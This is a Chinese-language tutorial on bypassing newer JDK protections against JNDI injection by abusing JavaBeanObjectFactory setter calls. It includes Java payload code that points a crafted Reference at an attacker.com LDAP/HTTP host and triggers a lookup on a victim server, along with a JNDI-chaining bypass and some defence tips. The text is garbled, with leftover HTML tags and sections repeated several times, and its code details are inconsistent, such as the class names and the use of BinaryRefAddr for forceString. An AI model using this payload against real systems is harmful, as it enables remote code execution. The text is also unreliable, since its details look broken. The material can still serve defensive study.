高版本JNDI利用：通过setter方法拓展攻击面<\/h1>

背景概述<\/h2>
在Java高版本环境中，传统的JNDI注入利用方式（如直接加载远程恶意类）已被限制。本文介绍一种通过调用setter方法拓展攻击面的技术，利用`JavaBeanObjectFactory<\/code>工厂类的getObjectInstance<\/code>方法实现攻击。<\/p>`

核心原理<\/h2>
JavaBeanObjectFactory<\/code>是JNDI SPI(Service Provider Interface)的一部分，其getObjectInstance<\/code>方法可以调用目标类的setter方法。这种机制为攻击者提供了新的攻击面。<\/p>
技术细节<\/h2>
关键限制条件<\/h3>

setter方法调用顺序固定<\/strong>：无法自定义调用顺序，这导致某些利用链（如JdbcRowSetImpl<\/code>）失效<\/li>
构造函数要求<\/strong>：目标类的构造函数必须是public的<\/li>
参数类型限制<\/strong>：传入的ref属性不能是String类型，需要使用BinaryRefAddr<\/code><\/li>
<\/ol>
成功利用的类<\/h3>
JtaTransactionConfig<\/code>类被证实可以利用，因为它：<\/p>

具有public构造函数<\/li>
包含可利用的setter方法<\/li>
能够通过特定参数触发恶意行为<\/li>
<\/ul>
利用步骤<\/h2>


构造恶意Reference<\/strong>：<\/p>

使用JavaBeanObjectFactory<\/code>作为工厂类<\/li>
设置目标类为可利用的类（如JtaTransactionConfig<\/code>）<\/li>
使用BinaryRefAddr<\/code>而非String传递参数<\/li>
<\/ul>
<\/li>

配置攻击载荷<\/strong>：<\/p>
Reference ref =<\/span> new<\/span> Reference(<\/span>"javax.transaction.xa.Xid"<\/span>,<\/span> 
<\/span><\/span>    "com.sun.jndi.ldap.JavaBeanObjectFactory"<\/span>,<\/span> 
<\/span><\/span>    "http:\/\/attacker.com\/"<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> BinaryRefAddr(<\/span>"forceString"<\/span>,<\/span> "a=setXaDataSource"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> BinaryRefAddr(<\/span>"a"<\/span>,<\/span> "ldap:\/\/attacker.com\/exploit"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre><\/li>

触发JNDI查找<\/strong>：<\/p>
Context ctx =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>ctx.<\/span>lookup<\/span>(<\/span>"ldap:\/\/victim-server\/malicious"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
绕过高版本限制<\/h2>
通过JNDI调用JNDI的方式可以绕过部分高版本限制：<\/p>

第一次JNDI查找返回一个Reference<\/li>
该Reference触发第二次JNDI查找<\/li>
第二次查找可能不受相同限制<\/li>
<\/ol>
防御建议<\/h2>

升级JDK到最新版本<\/li>
限制JNDI查找的来源<\/li>
实施网络层防护，限制出站连接<\/li>
使用安全管理器限制敏感操作<\/li>
<\/ol>
总结<\/h2>
这种技术通过利用JavaBean的setter方法调用机制，在高版本Java环境中拓展了JNDI注入的攻击面。安全团队应了解这种技术以更好地防御相关攻击。<\/p>

高版本JNDI利用：通过setter方法拓展攻击面<\/h1>

背景概述<\/h2> 在Java高版本环境中，传统的JNDI注入利用方式（如直接加载远程恶意类）已被限制。本文介绍一种通过调用setter方法拓展攻击面的技术，利用JavaBeanObjectFactory<\/code>工厂类的getObjectInstance<\/code>方法实现攻击。<\/p>

总结<\/h2> 这种技术通过利用JavaBean的setter方法调用机制，在高版本Java环境中拓展了JNDI注入的攻击面。安全团队应了解这种技术以更好地防御相关攻击。<\/p>

背景概述<\/h2>
在Java高版本环境中，传统的JNDI注入利用方式（如直接加载远程恶意类）已被限制。本文介绍一种通过调用setter方法拓展攻击面的技术，利用`JavaBeanObjectFactory<\/code>工厂类的getObjectInstance<\/code>方法实现攻击。<\/p>`

总结<\/h2>
这种技术通过利用JavaBean的setter方法调用机制，在高版本Java环境中拓展了JNDI注入的攻击面。安全团队应了解这种技术以更好地防御相关攻击。<\/p>